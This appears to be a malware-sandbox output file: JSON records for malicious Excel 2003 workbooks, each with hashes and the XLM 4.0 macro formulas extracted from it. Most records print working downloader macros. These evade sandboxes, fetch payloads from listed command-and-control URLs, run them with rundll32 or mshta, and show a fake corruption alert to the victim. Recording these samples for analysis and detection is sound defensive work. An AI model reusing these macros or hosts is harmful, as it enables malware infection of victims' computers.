{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a2803b3dce179af88c05b84abe8a5aa537c80452e6334f7f8ef0b6752d8b959"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a2803b3dce179af88c05b84abe8a5aa537c80452e6334f7f8ef0b6752d8b959","filesize":193024,"md5":"618845845ab5a2bd1393de1c5aaae944","sha1":"36d1baa9b062861e77bb186dfde1fcf8682d9b6c","sha256":"3a2803b3dce179af88c05b84abe8a5aa537c80452e6334f7f8ef0b6752d8b959","sha512":"749cda317f4d359b27b4e191052e70c72b1ab05aa3cf173423eedfcf13146d35be31c44e83e4a1d9ff19521b6269412699c0f4767afa5f191945148f72015c7b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a2803b3dce179af88c05b84abe8a5aa537c80452e6334f7f8ef0b6752d8b959.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"EXEC(\"mshta https://loubanas.xyz/Syj82yxQ\")\nALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it is corrupt.\",2)\nCLOSE(TRUE)\nHALT()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a2d9a58faf0340e30959692e6db8c4afdc5a912169ccf91a54e0c83213d7679"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a2d9a58faf0340e30959692e6db8c4afdc5a912169ccf91a54e0c83213d7679","filesize":206336,"md5":"91f9b4be75f73dda411c049ffb1bc891","sha1":"e058c338bd2df12e081a9bb53065459282d6e456","sha256":"3a2d9a58faf0340e30959692e6db8c4afdc5a912169ccf91a54e0c83213d7679","sha512":"fbf19eb5681316d2f08eccf2b6bc13ba89ba2835ecc0ca8820abaf2e81b45931cd6e910f4db2321b18f3480d9891518b19dbdc3e3ad3924cfc1fe034063ffd85","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a2d9a58faf0340e30959692e6db8c4afdc5a912169ccf91a54e0c83213d7679.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"7oNJnxNtz1\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a36c4875122585d5d8ebe59b8a4f78c572a9f561e2891dc08ffe73967b921ef"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a36c4875122585d5d8ebe59b8a4f78c572a9f561e2891dc08ffe73967b921ef","filesize":112640,"md5":"fa0b6dbfe5f80d6a44164c1c37318a0c","sha1":"a2b05e07d6430c8c41a8848227920a693e1edcc5","sha256":"3a36c4875122585d5d8ebe59b8a4f78c572a9f561e2891dc08ffe73967b921ef","sha512":"c9ee4bfddf67cca2573d24e2cc3768dcce85f57dae010c07d0afcdc4b9cf327c655cba5d03e8d78979c45b4d5ceabc1d13684453235e40cf1028b1208acfeac3","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a36c4875122585d5d8ebe59b8a4f78c572a9f561e2891dc08ffe73967b921ef.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://pnxkntdl.xyz/KDSBVksdhv778a"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a403b288d92e64aedc494fcd3647e12bea78ad48841797fb65041a70a1566b3"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a403b288d92e64aedc494fcd3647e12bea78ad48841797fb65041a70a1566b3","filesize":160768,"md5":"0b3efe24cdd589e958d1ef68b13f8f5b","sha1":"d23e02686b27b2f9bb7e5681d69d13aca8c39392","sha256":"3a403b288d92e64aedc494fcd3647e12bea78ad48841797fb65041a70a1566b3","sha512":"8d4e2c919884fd4ad565af8d9b5a0229986665cc0e257c0364ff03a8df7512225ce989043eef11543ba99cf9e542d21674356a16603c9c5ab892353aa65e8ce7","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a403b288d92e64aedc494fcd3647e12bea78ad48841797fb65041a70a1566b3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/deg34g","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cmgp5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cmgp5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Tay0OHGnUg\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a479341e73523cbe774dc7caa4872f68f57b90fe17037212e66e171a3c348d8"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a479341e73523cbe774dc7caa4872f68f57b90fe17037212e66e171a3c348d8","filesize":104448,"md5":"7bcef42ecb690cd057b8485951283426","sha1":"c8912c621abb70f64cd8670128f031e19b7cfb0c","sha256":"3a479341e73523cbe774dc7caa4872f68f57b90fe17037212e66e171a3c348d8","sha512":"da7be74e609ca55b0a34dfbb802416b00e990fe3b34be1587e488502f65f33fef1fe5152a23b756f2aa5b5ab4ae980a6d41f27fb4edc0ac4b327cee21c339302","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a479341e73523cbe774dc7caa4872f68f57b90fe17037212e66e171a3c348d8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"R4Mo75CsHj\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a482426c3ff04f565cd51812f7a29c7d25de7e39a52011ba33e152e877265f5"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a482426c3ff04f565cd51812f7a29c7d25de7e39a52011ba33e152e877265f5","filesize":185344,"md5":"9dfdb4856018330b68edf2a5d9657a8a","sha1":"10fc62eca7be036419a859c5232fea343f6d3018","sha256":"3a482426c3ff04f565cd51812f7a29c7d25de7e39a52011ba33e152e877265f5","sha512":"30f9a2fef0a7ff824d11cb30029dbc4dedb197677e992c24a8c28a173612914569707989ae0c31eeb45ee450b0483ed8c842ae0936d389d525226ef250eaf9e8","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a482426c3ff04f565cd51812f7a29c7d25de7e39a52011ba33e152e877265f5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://merystol.xyz/6ng688x8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a51bd6c062a979cc50a9e60c2ca780b663a2db5373c051c8bedfaa3e0533007"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a51bd6c062a979cc50a9e60c2ca780b663a2db5373c051c8bedfaa3e0533007","filesize":170496,"md5":"24cb992778a998d3dc6c8a33b9c9ece3","sha1":"6d9a5cb45e591adef156948b97959a55e1690719","sha256":"3a51bd6c062a979cc50a9e60c2ca780b663a2db5373c051c8bedfaa3e0533007","sha512":"fc26f298b608f3ae60ffb3102996953c19f7e2d452d1ef4462c318b1f30d6e6f8e03117e6347ebade81f065f15dc48c86502ce0fc4c798a56a781997146cfd3f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a51bd6c062a979cc50a9e60c2ca780b663a2db5373c051c8bedfaa3e0533007.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"JWzMrJFJkt\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a837b3e7410d082c4685c615544bf0ce742908de7586e92494be661f2e88739"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a837b3e7410d082c4685c615544bf0ce742908de7586e92494be661f2e88739","filesize":206336,"md5":"5a72e4ab1b2d54889a4ce7fc955c222d","sha1":"4be7bf631c14584c71135568cb7f37ede46d4cec","sha256":"3a837b3e7410d082c4685c615544bf0ce742908de7586e92494be661f2e88739","sha512":"3ef7b4675ea5c158a9d3041cb22a81142d02482fa3d811e1a8e11a5a3b434d84a7d12cc5840b603b50ff047fe7f085b8b47eca3b7199a0f9102e3c0070e5742e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a837b3e7410d082c4685c615544bf0ce742908de7586e92494be661f2e88739.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"CmQxhefRcm\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a9bb56cd7386b32d8d86435907a85cfc7e78c64789e8e7d87ea8dae5c2643b7"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a9bb56cd7386b32d8d86435907a85cfc7e78c64789e8e7d87ea8dae5c2643b7","filesize":206336,"md5":"e9b1b8cf8cb7b36e7f164b9ccad2e2d9","sha1":"2908f022a14e67093ed089585c1162830f287d01","sha256":"3a9bb56cd7386b32d8d86435907a85cfc7e78c64789e8e7d87ea8dae5c2643b7","sha512":"d986d58de076c6823331aa5bd32e2d58fd1ba36fc3b6f9d014ae5f5edb036bec6bff933a87eed862b142f5bdfda03b377910c38ebf3b70149ecd747482cac4b0","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a9bb56cd7386b32d8d86435907a85cfc7e78c64789e8e7d87ea8dae5c2643b7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"931qDawkOJ\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3a9f29424280537ee466037645afa843fe7854f84ecb22a689c0beef9bcecbcd"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3a9f29424280537ee466037645afa843fe7854f84ecb22a689c0beef9bcecbcd","filesize":185344,"md5":"ef9aff4b6d14a2ef0c5842222868b910","sha1":"3c49cecddaa775690b0cd8a28f3a408e319a5707","sha256":"3a9f29424280537ee466037645afa843fe7854f84ecb22a689c0beef9bcecbcd","sha512":"3ef4cc15ad44b3020808520df7c84eda325f78d18a78f8f2837395746349be26d0f7b64daa535af527898e68eaf3c4c465569e7adc37bc3a8a93983e908ebd17","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3a9f29424280537ee466037645afa843fe7854f84ecb22a689c0beef9bcecbcd.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3aa01ca360ca6a27d2eb527d6bfe50ae663b30b0de6b711ff9010b431fc77483"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3aa01ca360ca6a27d2eb527d6bfe50ae663b30b0de6b711ff9010b431fc77483","filesize":109568,"md5":"af6cc8ad7fa87c896ee3eb2928c4bd6e","sha1":"d4cd6c3f976385e209faea0ec2ac10ab46825d2b","sha256":"3aa01ca360ca6a27d2eb527d6bfe50ae663b30b0de6b711ff9010b431fc77483","sha512":"323549be1e21e9c495e352dc085f42e50018e7f0459d5b60dc9b059a223b5ed75e6c798b9507031e14d681684979b4ccadf4e850b589b26041ef6f88e9d6b4de","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3aa01ca360ca6a27d2eb527d6bfe50ae663b30b0de6b711ff9010b431fc77483.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://wgyafqtc.online/fgwg24g24g"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(GET.WORKSPACE(13)\u003c770,CLOSE(FALSE),)\nIF(GET.WORKSPACE(14)\u003c381,CLOSE(FALSE),)\nRETURN()\nRETURN()\nWORKBOOK.HIDE(\"NNN8XhzA4w\",TRUE)\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ad22bf2aa6285c1f1b76eaf2a2e9c5065f553e98642c9bd0ce09555086ba3c2"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3ad22bf2aa6285c1f1b76eaf2a2e9c5065f553e98642c9bd0ce09555086ba3c2","filesize":152576,"md5":"a2c42a5fa07d808247efc3f8b3e83b44","sha1":"4aab5ec66ebf68d1323def0eeefcd7e09b305f96","sha256":"3ad22bf2aa6285c1f1b76eaf2a2e9c5065f553e98642c9bd0ce09555086ba3c2","sha512":"384ed67ff435f764d3f87221c42301cb21dc56094d3b10e16b5f977440c5432bce2a2c8ebe800d27a6909c8cbb92851588a1a0d5a180a0526b6bdd55a64e76eb","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ad22bf2aa6285c1f1b76eaf2a2e9c5065f553e98642c9bd0ce09555086ba3c2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/ajt1eg4fh3a"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/ajt1eg4fh3a\",\"c:\\Users\\Public\\awefwef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\awefwef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"ZCDVTMfY32\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3add204fdbae27615aeae6c83e71e8e08d740785b1317548a72da5516c2fedb2"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3add204fdbae27615aeae6c83e71e8e08d740785b1317548a72da5516c2fedb2","filesize":185344,"md5":"59db81e683b41ce6f79b2470f2f9f3d6","sha1":"01e99e75c43143e478e967f646e89aea235b5eee","sha256":"3add204fdbae27615aeae6c83e71e8e08d740785b1317548a72da5516c2fedb2","sha512":"5031836688a30ab8a57e3d07da790c011c0e1a79096af8296bdabc2eecae97acb53593764364d55bacb5efee4204889bdd2f47b324481b16e0f535077d98c49d","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3add204fdbae27615aeae6c83e71e8e08d740785b1317548a72da5516c2fedb2.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://doolised.xyz/DSBVhsdv78f"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3ae337650e390f821aa971feae5f5b5fbd1f2e43d2c8179744a08796c839cbf7"},"analysis":{"reported":"2020-04-09T16:15:49Z","score":10},"files":[{"filename":"3ae337650e390f821aa971feae5f5b5fbd1f2e43d2c8179744a08796c839cbf7","filesize":206336,"md5":"82167af5b6d127ff9d1d1cd83163f104","sha1":"0b0666bb207e89cb4df3570e75c3b9ca823d76cf","sha256":"3ae337650e390f821aa971feae5f5b5fbd1f2e43d2c8179744a08796c839cbf7","sha512":"cb014496b9ef330e502c867e4981dda9d6e99d9de0d84d25108792e55471efbb6eb766a341369d312dc767fc82c21bed9702ab5733b3fe3a09d639e6efd40180","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3ae337650e390f821aa971feae5f5b5fbd1f2e43d2c8179744a08796c839cbf7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"yOLEcsvRyo\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3af2cee8c2de5990bb4c95910daab6bfc0bfc21a9518ae0092b5e95ed152326f"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3af2cee8c2de5990bb4c95910daab6bfc0bfc21a9518ae0092b5e95ed152326f","filesize":185344,"md5":"28a7bb783e909a72bdcaf59b7037fce7","sha1":"e1133790ae05834d0dad34d72fd8122ff02778c9","sha256":"3af2cee8c2de5990bb4c95910daab6bfc0bfc21a9518ae0092b5e95ed152326f","sha512":"54da97851ac8fa99889b6e85fcdb07bde12573f8e8bdf08c40120f2c1110b3a090a4a3686d9f271e2f30eab489acbea446e991bbcb754a962875caf3f552849f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3af2cee8c2de5990bb4c95910daab6bfc0bfc21a9518ae0092b5e95ed152326f.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://emmnebuc.xyz/SDVJKBsdkhv1"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"IF(ALERT(\"We found a problem with some content. Do you want to try to recover as much as we can?\",1),,CLOSE(TRUE))\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"3af9a79a4df4e5929d0715719a5285e8a650e0ca5983296cbbf9465442eac5e0"},"analysis":{"reported":"2020-04-09T16:15:50Z","score":10},"files":[{"filename":"3af9a79a4df4e5929d0715719a5285e8a650e0ca5983296cbbf9465442eac5e0","filesize":167936,"md5":"70891dc16769b985ddd4c5d9f58b1c41","sha1":"4313c7234a171e0cc7d05d37ff1b335ff0d4a103","sha256":"3af9a79a4df4e5929d0715719a5285e8a650e0ca5983296cbbf9465442eac5e0","sha512":"48fe11bd188fbddee1f83b232df3e52703c4c9b15f6ad71261ca77fc0b57317c13cb2cf9ec3b4b8d6bec223fba3be40f1234639f21ec7b78c3d23af9edd32076","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"3af9a79a4df4e5929d0715719a5285e8a650e0ca5983296cbbf9465442eac5e0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"Gwn5CdoGsu\",TRUE)\nGOTO(R$0C$19)"}}}]}
